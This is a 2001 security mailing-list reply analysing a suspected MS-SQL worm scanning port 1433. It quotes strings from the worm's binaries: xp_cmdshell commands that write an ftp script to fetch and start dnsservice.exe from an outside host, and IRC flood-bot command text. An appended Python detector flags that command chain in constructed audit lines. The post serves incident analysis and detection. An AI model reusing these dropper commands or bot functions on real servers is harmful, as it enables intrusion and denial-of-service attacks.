Security Incidents mailing list archives

Re: MS-SQL Worm?


From: Paul Nasrat <pnasrat () uk now com>
Date: Tue, 20 Nov 2001 17:09:48 +0000

On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote:

We saw a scan come in looking for systems answering on 1433, and
immediately saw several systems start scanning out for other systems
answering on 1433 - worm behavior?  Has anyone else seen this?

No, but the binaries it downloads:

win32mon.exe and dnsservice.exe

are on the ftp site in the dump.  I don't have a windows debugger to put
them through but they look interesting:

exec xp_cmdshell 'start dnsservice.exe'
exec xp_cmdshell 'del ftp.x'
exec xp_cmdshell 'ftp -s:ftp.x 
exec xp_cmdshell 'echo quit >> ftp.x'
exec xp_cmdshell 'echo close >> ftp.x'
exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x'
exec xp_cmdshell 'echo cd tmp>> ftp.x'
exec xp_cmdshell 'echo cd pub>> ftp.x'
exec xp_cmdshell 'echo bin>> ftp.x'
exec xp_cmdshell 'echo foo.com>> ftp.x'
exec xp_cmdshell 'echo ftp> ftp.x'

GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
[GET] - Unable to connect to http.
[GET] - Unable to resolve host.
http://
[GET] - Unable to create new socket.
GET <bot|wildcard> <host> <save as>
%s %s %s %s
NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu)
NICK %s
NOTICE %s :Nick cannot be larger than 9 characters.
NOTICE %s :NICK <nick>
sm6 has finished...
with tcp/syn boost!
sm6 icmp/udp has begun...
sm6 icmp/udp (w/pkt-push!) has begun..
Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src
port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t
include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file>

etc.

Paul Nasrat
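The strings above show the dropper chain the worm drives through xp_cmdshell: echo a line at a time into an ftp script, run ftp non-interactively from it, then start the fetched executable. The following is an added example, not code from this thread or from the worm, that flags a client which completes all three stages in a set of SQL Server command-audit lines; the line format (timestamp, client IP, statement) and the audit lines themselves are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of SQL Server command-audit lines (not real logs):
# "<timestamp> <client_ip> <T-SQL statement>"
SAMPLE_AUDIT = """\
2001-11-20T16:58:01 10.0.0.7 select name from sysobjects
2001-11-20T16:58:02 10.0.0.9 exec xp_cmdshell 'echo ftp> ftp.x'
2001-11-20T16:58:02 10.0.0.9 exec xp_cmdshell 'echo foo.com>> ftp.x'
2001-11-20T16:58:03 10.0.0.9 exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x'
2001-11-20T16:58:03 10.0.0.9 exec xp_cmdshell 'echo quit >> ftp.x'
2001-11-20T16:58:04 10.0.0.9 exec xp_cmdshell 'ftp -s:ftp.x'
2001-11-20T16:58:05 10.0.0.9 exec xp_cmdshell 'start dnsservice.exe'
2001-11-20T16:59:00 10.0.0.7 exec xp_cmdshell 'dir c:\\backup'
"""

XP_CMDSHELL = re.compile(r"xp_cmdshell\s+'(?P<cmd>[^']*)'?", re.IGNORECASE)

# Stages of the dropper chain seen in the binary's strings: write a script
# with echo redirection, run ftp non-interactively from it, launch the payload.
STAGES = {
    "script_write": re.compile(r"^echo\s.*>>?\s*\S+", re.IGNORECASE),
    "ftp_script":   re.compile(r"^ftp\s+-s:", re.IGNORECASE),
    "launch_exe":   re.compile(r"^start\s+\S+\.exe", re.IGNORECASE),
}

def parse_line(line):
    """Return (client_ip, command) for an xp_cmdshell audit line, else None."""
    parts = line.split(" ", 2)
    if len(parts) < 3:
        return None
    m = XP_CMDSHELL.search(parts[2])
    if not m:
        return None
    return parts[1], m.group("cmd").strip()

def find_dropper_chains(audit_text):
    """Map client IP -> sorted list of chain stages that client has hit."""
    seen = defaultdict(set)
    for line in audit_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, cmd = parsed
        for stage, pat in STAGES.items():
            if pat.search(cmd):
                seen[ip].add(stage)
    return {ip: sorted(stages) for ip, stages in seen.items()}

def flagged_clients(audit_text):
    """Clients that completed the full write-script / ftp -s: / start chain."""
    chains = find_dropper_chains(audit_text)
    return sorted(ip for ip, st in chains.items() if len(st) == len(STAGES))
```

A single stage on its own (an admin running `dir` through xp_cmdshell) is not flagged; only the full chain from one client is.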

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
